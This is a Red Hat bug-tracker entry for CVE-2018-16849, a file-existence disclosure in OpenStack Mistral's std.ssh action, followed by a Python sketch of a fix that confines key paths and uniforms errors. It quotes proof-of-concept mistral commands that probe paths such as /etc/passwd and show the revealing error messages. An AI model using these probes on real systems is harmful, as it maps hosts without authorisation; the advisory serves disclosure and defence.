Bug 1645334 (CVE-2018-16849) - CVE-2018-16849 openstack-mistral: std.ssh action may disclose presence of arbitrary files
Status: NEW
Alias: CVE-2018-16849
Product: Security Response
Classification: Other
Component: vulnerability   
Version: unspecified
Hardware: All Linux
Priority: medium
Severity: medium
Target Milestone: ---
Assignee: Red Hat Product Security
Whiteboard: impact=moderate,public=20181102,repor...
Keywords: Security
Depends On: 1645350 1645351 1679103
Blocks: 1623055
Reported: 2018-11-02 01:12 UTC by James Hebden
Modified: 2019-02-20 11:05 UTC

Fixed In Version: openstack-mistral 7.0.1
Doc Text:
An information disclosure is possible by manipulating the SSH private key filename of a std.ssh action in OpenStack Mistral before 7.0.1. Using this flaw, it is possible to determine the presence of a file path on the host executing the std.ssh action based on the returned error message.

Description James Hebden 2018-11-02 01:12:48 UTC
The std.ssh action can be used to disclose the presence of arbitrary files within the filesystem of the executor running the action.
Since std.ssh private_key_filename can take an absolute path, it can be used to assess whether or not a file exists on the executor's filesystem.

Comment 1 James Hebden 2018-11-02 02:59:43 UTC
Upstream bug: https://bugs.launchpad.net/mistral/+bug/1783708

Comment 3 James Hebden 2018-11-02 03:31:36 UTC
Example from the upstream bug:

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/notthere"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/notthere'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: [Errno 2] No such file or directory: u'/notthere'"}

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/passwd"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/passwd'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}


This can help detect the nature of the underlying system:

For example, to test for the presence of a Fedora release file:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/fedora-release"}'
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/fedora-release'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}
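
Added example (not part of the bug report and not Mistral's own fix): one way to close this kind of existence oracle is to accept only a bare key file name inside a fixed directory and to return one error message for every failure. The names key_dir, load_private_key and GENERIC_ERROR, the PEM-header check standing in for the real key parser, and the sample files are assumptions made for illustration.

```python
import os
import tempfile

GENERIC_ERROR = "private key could not be loaded"  # same text for every failure

class KeyLoadError(Exception):
    """Raised with one fixed message so callers cannot tell failures apart."""

def resolve_key_path(key_dir, name):
    # Accept a bare file name only: no absolute paths, no directory parts.
    if not name or name in (".", "..") or os.path.basename(name) != name:
        raise KeyLoadError(GENERIC_ERROR)
    path = os.path.realpath(os.path.join(key_dir, name))
    # realpath() follows symlinks, so a link pointing outside key_dir is refused.
    if os.path.dirname(path) != os.path.realpath(key_dir):
        raise KeyLoadError(GENERIC_ERROR)
    return path

def load_private_key(key_dir, name):
    path = resolve_key_path(key_dir, name)
    try:
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError:
        # Missing, unreadable, is-a-directory: all collapse to one message.
        raise KeyLoadError(GENERIC_ERROR) from None
    # Stand-in for the real key parser (assumption): only checks the PEM header.
    if not data.startswith(b"-----BEGIN "):
        raise KeyLoadError(GENERIC_ERROR)
    return data

def error_for(key_dir, name):
    """Return the message a client would see, or None on success."""
    try:
        load_private_key(key_dir, name)
        return None
    except KeyLoadError as exc:
        return str(exc)

def demo():
    # Constructed sample directory: one key-like file and one ordinary file.
    key_dir = tempfile.mkdtemp()
    with open(os.path.join(key_dir, "id_rsa"), "wb") as fh:
        fh.write(b"-----BEGIN RSA PRIVATE KEY-----\n(constructed)\n")
    with open(os.path.join(key_dir, "notes.txt"), "wb") as fh:
        fh.write(b"not a key\n")
    names = ["id_rsa", "notes.txt", "missing", "/etc/passwd", "../x"]
    return {n: error_for(key_dir, n) for n in names}
```

demo() returns None for the key-like file and the identical generic message for the existing non-key file, the missing file, the absolute path and the traversal attempt, so the response no longer distinguishes "No such file or directory" from "not a valid RSA private key file".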

